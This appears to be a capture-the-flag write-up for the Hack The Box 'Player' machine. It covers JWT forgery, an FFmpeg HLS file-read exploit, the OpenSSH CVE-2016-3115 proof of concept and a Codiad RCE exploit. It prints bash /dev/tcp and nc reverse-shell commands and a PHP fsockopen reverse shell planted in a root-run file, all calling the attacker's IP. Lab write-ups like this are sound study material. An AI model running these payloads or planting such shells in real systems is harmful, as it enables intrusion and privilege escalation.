Hey Guys player from Hack The Box was retired and here is my write up about it. 

This is an hard linux machine.so I added its ip address 10.10.10.145 to /etc/hosts as player.htb so let’s get jump in. 

Enumeration 

Nmap 

As always we start with nmap to scan for open ports and services 

“` 

root@ch4n:~# nmap -sC -sV 10.10.10.145 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 20:36 EST 

Nmap scan report for player.htb (10.10.10.145) 

Host is up (0.25s latency). 

Not shown: 998 closed ports 

PORT   STATE SERVICE VERSION 

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0) 

| ssh-hostkey: 

|   1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA) 

|   2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA) 

|   256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA) 

|_  256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519) 

80/tcp open  http    Apache httpd 2.4.7 

|_http-title: 403 Forbidden 

6686/tcp ​ open​ ssh OpenSSH 7.2 (protocol 2.0) 

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 64.39 seconds 

“` 

There is ssh on port 22 ,web page is running on port 80 and there is another ssh open on port 6686. 

It also mentioned it is 403. 

Web Page 

Here we can see that it is foridden. 

Then I used wfuzz to scan the dir 

“` 

root@ch4n:~# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt –hc 404,401,302,403 http://player.htb/FUZZ 

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information. 

******************************************************** 

* Wfuzz 2.4 – The Web Fuzzer                           * 

******************************************************** 

Target: http://player.htb/FUZZ 

Total requests: 20116 

=================================================================== 

ID           Response   Lines    Word     Chars       Payload         

=================================================================== 

000018125:   301        9 L      28 W     310 Ch      “launcher”    

“` 

here we got a dir called launcher.Let’s check it:-) 

Launcher 

seems like nothing interseting:-) 

So the next thing that I wanna do to scan the subdomain 

“` 

root@ch4n:~# wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt –hc 400,404,403 -H “Host: FUZZ.player.htb” -u http://10.10.10.145 -t 100 

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information. 

******************************************************** 

* Wfuzz 2.4 – The Web Fuzzer                           * 

******************************************************** 

Target: http://10.10.10.145/ 

Total requests: 19983 

=================================================================== 

ID           Response   Lines    Word     Chars       Payload         

=================================================================== 

000000019:   200        86 L     229 W    5243 Ch     “dev”           

000000067:   200        63 L     180 W    1470 Ch     “staging”       

000000070:   200        259 L    714 W    9513 Ch     “chat”          

Total time: 143.2438 

Processed Requests: 19983 

Filtered Requests: 19980 

Requests/sec.: 139.5033 

“` 

In here we got 3 subdomain so I added all of these to etc/hosts 

dev.player.htb 

In dev.player.htb,it seems like we need creds to login.I dont have any creds so let’s move. 

staging.player.htb 

In this,Contact core team is interesting when I sumbited something I got 501 internal error. 

So I used the burp then used curl 

“` 

root@ch4n:~# curl http://staging.player.htb/contact.php 

array(3) { 

  [0]=> 

  array(4) { 

    [“file”]=> 

    string(28) “/var/www/staging/contact.php” 

    [“line”]=> 

    int(6) 

    [“function”]=> 

    string(1) “c” 

    [“args”]=> 

    array(1) { 

      [0]=> 

      &string(9) “Cleveland” 

    } 

  } 

  [1]=> 

  array(4) { 

    [“file”]=> 

    string(28) “/var/www/staging/contact.php” 

    [“line”]=> 

    int(3) 

    [“function”]=> 

    string(1) “b” 

    [“args”]=> 

    array(1) { 

      [0]=> 

      &string(5) “Glenn” 

    } 

  } 

  [2]=> 

  array(4) { 

    [“file”]=> 

    string(28) “/var/www/staging/contact.php” 

    [“line”]=> 

    int(11) 

    [“function”]=> 

    string(1) “a” 

    [“args”]=> 

    array(1) { 

      [0]=> 

      &string(5) “Peter” 

    } 

  } 

Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php 

“` 

The last two lines are interesting things.I will note that:-) 

After reading messages in here, I noticed that 

“` 

They mentioned our staging exposing some sensitive files and main domain exposing source code which allowing them to access our product before release. Currently our team working on the fix

“` 

So I come back to main page then check the launcher page.I captured the request with burp 

when I refresh the page 

“` 

/launcher/dee8dc8a47256c64630d803a4c40786e.php 

“` 

Receiving the following requests 

“` 

Not released yet 

“` 

But when I click 

“` 

enter your eamil send 

“` 

Got this.It is slightly different from previous one 

“` 

/launcher/dee8dc8a47256c64630d803a4c40786c.php 

“` 

Then got the following response 

When I check with this cookie got the following reponse:-) 

In here I remember that in chat  which says that the main domain is exposing the source code. 

After goggling about that I found an interesting one 

PHP Source Code Disclose 

“` 

https://www.rapid7.com/db/vulnerabilities/http-php-temporary-file-source-disclosure

“` 

From above url 

“` 

Various text editors automatically save backups of each file the user chooses to open with file names such as: file.ext~, #file.ext#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old. If the user edits a PHP file in the web root, the backup that is created will not be parsed by the PHP engine upon request, but will instead be returned to the remote attacker unmodified. Thus, the script’s source code is disclosed. 

“` 

We got some information about that.So I come back to the burp in add ~ after php.Got the following php code:-) 

“` 

HTTP/1.1 200 OK 

Date: Fri, 17 Jan 2020 17:57:08 GMT 

Server: Apache/2.4.7 (Ubuntu) 

Last-Modified: Tue, 30 Apr 2019 12:03:54 GMT 

ETag: “2e6-587be31e5b56e” 

Accept-Ranges: bytes 

Content-Length: 742 

Connection: close 

<?php 

require ‘vendor/autoload.php’; 

use \Firebase\JWT\JWT; 

if(isset($_COOKIE[“access”])) 

$key = ‘_S0_R@nd0m_P@ss_’; 

$decoded = JWT::decode($_COOKIE[“access”], base64_decode(strtr($key, ‘-_’, ‘+/’)), [‘HS256’]); 

if($decoded->access_code === “0E76658526655756207688271159624026011393”) 

header(“Location: 7F2xxxxxxxxxxxxx/”); 

else 

header(“Location: index.html”); 

else 

$token_payload = [ 

  ‘project’ => ‘PlayBuff’, 

  ‘access_code’ => ‘C0B137FE2D792459F26FF763CCE44574A5B5AB03’ 

]; 

$key = ‘_S0_R@nd0m_P@ss_’; 

$jwt = JWT::encode($token_payload, base64_decode(strtr($key, ‘-_’, ‘+/’)), ‘HS256’); 

$cookiename = ‘access’; 

setcookie(‘access’,$jwt, time() + (86400 * 30), “/”); 

header(“Location: index.html”); 

?> 

“` 

let’s see the above code contains JWT token.It seems like we can use php to generate a new token for more privilleges. 

Let’s analyze this in https://jwt.io/ 

The decoded token is C0B137FE2D792459F26FF763CCE44574A5B5AB03 

and we need to change the acess code and from the php source code we can see that _S0_R@nd0m_P@ss_ is as a key and the acess code is 0E76658526655756207688271159624026011393. 

By using acess code and key we can generate a new token. 

Here I generated the new token.And come back to burp an got the new part of launcher dir 

﷟HYPERLINK “http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/” 

﷟HYPERLINK “http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/” 

﷟HYPERLINK “http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/” 

http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/

When we browse this url we got this page:-) 

It said Compress and Secure your media 

when I test with some a extension as .jpg,it output as avi file 

FFmpeg HLS vulnerability 

So when I search for avi exploit and found this 

“` 

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS

“` 

let’s try to read /etc/passwd, so we can know that the script is work or not 

“` 

root@ch4n:~/Desktop/htb/boxes/player# python3 gen_avi.py file:///etc/passwd passwd.avi 

“` 

I uploaded this passwd.avi file and download the converted file then play it 

 here we can see that it worked but this file look like wiered.so I searched for another version. 

After some googling,I found a hacker one  report. 

“` 

https://hackerone.com/reports/237381

“` 

“` 

root@ch4n:~/Desktop/htb/boxes/player# python3 gen_avi.py file:///etc/passwd passwd.avi / etc_passwd.avi 

“` 

then do the same thing 

So it is better. 

Then I remember this line from enumeration of  http://staging.player.htb/contact.php 

Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php 

we need to look for service_config 

“` 

python3 gen_avi.py file:///var/www/backup/service_config service_config.avi 

“` 

here we  got some creds 

username – telegen 

password – ‘d-bC|jC!2uepS/w’ 

So I am using this creds to login to ssh 

“` 

root@ch4n:~/Desktop/htb/boxes/player# ssh telegen@player.htb -p 6686 

telegen@player.htb’s password: 

Last login: Sat Jan 18 07:54:12 2020 from 10.10.15.43 

Environment: 

  USER=telegen 

  LOGNAME=telegen 

  HOME=/home/telegen 

  PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin 

  MAIL=/var/mail/telegen 

  SHELL=/usr/bin/lshell 

  SSH_CLIENT=10.10.14.243 34562 6686 

  SSH_CONNECTION=10.10.14.243 34562 10.10.10.145 6686 

  SSH_TTY=/dev/pts/2 

  TERM=xterm-256color 

========= PlayBuff ========== 

Welcome to Staging Environment 

telegen:~$ ls 

*** forbidden command: ls 

telegen:~$ ls -la 

*** forbidden command: ls 

telegen:~$ help 

  clear  exit  help  history  lpath  lsudo 

telegen:~$ lpath 

Allowed: 

 /home/telegen 

“` 

We got restricted shell.So I look at again my port scan  OpenSSH 7.2 on port 6686 will vulnerable so I goggling about it and found this:-) 

https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115

after running this file and we can read the file and grab the user.txt 

So let’s check this file 

when I try to read this file  /var/www/staging/fix.php  with gen_avi.py then upload the output file and downloaded converted and we got all in blank so I tried to read this file from poc.py shell it worked:-) 

“` 

#> .readfile /home/telegen/user.txt 

DEBUG:__main__:auth_cookie: ‘xxxx\nsource /home/telegen/user.txt\n’ 

DEBUG:__main__:dummy exec returned: None 

INFO:__main__:30e47abe9e315c0c39462d0cf71c0f48 

#> .readfile  /var/www/staging/fix.php 

DEBUG:__main__:auth_cookie: ‘xxxx\nsource  /var/www/staging/fix.php\n’ 

DEBUG:__main__:dummy exec returned: None 

INFO:__main__:<?php 

class 

protected 

protected 

protected 

public 

return 

public 

if($result 

static::passed($test_name); 

static::failed($test_name); 

public 

if($result 

static::failed($test_name); 

static::passed($test_name); 

public 

if(!$username){ 

$username 

$password 

//modified 

//for 

//fix 

//peter 

//CQXpm\z)G5D#%S$y= 

public 

if($result 

static::passed($test_name); 

static::failed($test_name); 

public 

echo 

echo 

echo 

private 

echo 

static::$failed++; 

private 

static::character(“.”); 

static::$passed++; 

private 

echo 

static::$last_echoed 

private 

if(static::$last_echoed 

echo 

static::$last_echoed 

“` 

Here we got 

“` 

username – peter 

password – CQXpm\z)G5D#%S$y= 

“` 

So we got some creds 

After googling about codiad exploits and found this 

“` 

https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit

“` 

So I run the exploit 

“` 

root@ch4n:~/Desktop/htb/boxes/player# python exploit.py http://dev.player.htb/ peter ‘CQXpm\z)G5D#%S$y=’ 10.10.14.243 9001 linux 

[+] Please execute the following command on your vps: 

echo ‘bash -c “bash -i >/dev/tcp/10.10.14.243/9002 0>&1 2>&1″‘ | nc -lnvp 9001 

nc -lnvp 9002 

[+] Please confirm that you have done the two command above [y/n] 

[Y/n] y 

[+] Starting… 

[+] Login Content : {“status”:”success”,”data”:{“username”:”peter”}} 

[+] Login success! 

[+] Getting writeable path… 

[+] Path Content : {“status”:”success”,”data”:{“name”:”ch4n”,”path”:”test”}} 

[+] Writeable Path : test 

[+] Sending payload… 

“` 

echo this 

“` 

root@ch4n:~/Desktop/htb/boxes/player# echo ‘bash -c “bash -i >/dev/tcp/10.10.14.243/9002 0>&1 2>&1″‘ | nc -lnvp 9001 

Ncat: Version 7.80 ( https://nmap.org/ncat ) 

Ncat: Listening on :::9001 

Ncat: Listening on 0.0.0.0:9001 

Ncat: Connection from 10.10.10.145. 

Ncat: Connection from 10.10.10.145:52386. 

“` 

and set up the listener and grab the www-data shell 

“` 

root@ch4n:~/Desktop/htb/boxes/player# nc -lnvp 9002 

Ncat: Version 7.80 ( https://nmap.org/ncat ) 

Ncat: Listening on :::9002 

Ncat: Listening on 0.0.0.0:9002 

Ncat: Connection from 10.10.10.145. 

Ncat: Connection from 10.10.10.145:50732. 

bash: cannot set terminal process group (2272): Inappropriate ioctl for device 

bash: no job control in this shell 

www-data@player:/var/www/demo/components/filemanager$id 

id 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

“` 

So I run the pspy tool and found the interesting file called /usr/bin/php /var/lib/playbuff/buff.php 

/var/lib/playbuff/buff.php 

“` 

www-data@player:/dev/shm$ cat /var/lib/playbuff/buff.php 

cat /var/lib/playbuff/buff.php 

<?php 

include(“/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php”); 

class playBuff 

public $logFile=”/var/log/playbuff/logs.txt”; 

public $logData=”Updated”; 

public function __wakeup() 

file_put_contents(__DIR__.”/”.$this->logFile,$this->logData); 

$buff = new playBuff(); 

$serialbuff = serialize($buff); 

$data = file_get_contents(“/var/lib/playbuff/merge.log”); 

if(unserialize($data)) 

$update = file_get_contents(“/var/lib/playbuff/logs.txt”); 

$query = mysqli_query($conn, “update stats set status=’$update’ where id=1”); 

if($query) 

echo ‘Update Success with serialized logs!’; 

else 

file_put_contents(“/var/lib/playbuff/merge.log”,”no issues yet”); 

$update = file_get_contents(“/var/lib/playbuff/logs.txt”); 

$query = mysqli_query($conn, “update stats set status=’$update’ where id=1”); 

if($query) 

echo ‘Update Success!’; 

?> 

“` 

buff.php calls /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php 

this file is owned by www-data 

“` 

www-data@player:/dev/shm$ cat /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php 

cat /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php               

<?php 

$servername = “localhost”; 

$username = “root”; 

$password = “”; 

$dbname = “integrity”; 

// Create connection 

$conn = new mysqli($servername, $username, $password, $dbname); 

// Check connection 

if ($conn->connect_error) { 

    die(“Connection failed: ” . $conn->connect_error); 

?> 

“` 

So I added reverse shell in this file 

like this: 

“` 

<?php 

$sock=fsockopen(“10.10.14.243”,311);exec(“/bin/sh -i <&3 >&3 2>&3”); 

$servername = “localhost”; 

$username = “root”; 

$password = “”; 

$dbname = “integrity”; 

// Create connection 

$conn = new mysqli($servername, $username, $password, $dbname); 

// Check connection 

if ($conn->connect_error) { 

    die(“Connection failed: ” . $conn->connect_error); 

?> 

“` 

then set up the listener and got root 

That’s it guys! 

Hope you enjoy my write up. 

Don’t forget to check other write up on my blog 

https://0xchan.github.io/

Respect me on HTB 

https://www.hackthebox.eu/home/users/profile/81292

Author

CH4N